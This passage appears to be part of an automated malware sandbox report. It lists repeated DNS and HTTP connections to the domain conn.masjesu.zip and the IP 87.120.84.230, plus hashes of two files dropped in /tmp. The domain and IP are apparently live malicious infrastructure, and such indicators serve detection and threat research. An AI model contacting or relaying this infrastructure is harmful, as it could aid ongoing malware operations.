| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ
| MD5 | 7689ca8c5bc85cf6b78ef89323d4df6a |
| SHA1 | a1392ec3b571b3de167f0b9a5dadab4f14a2db76 |
| SHA256 | 17dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5 |
| SHA512 | 40f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471 |
/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |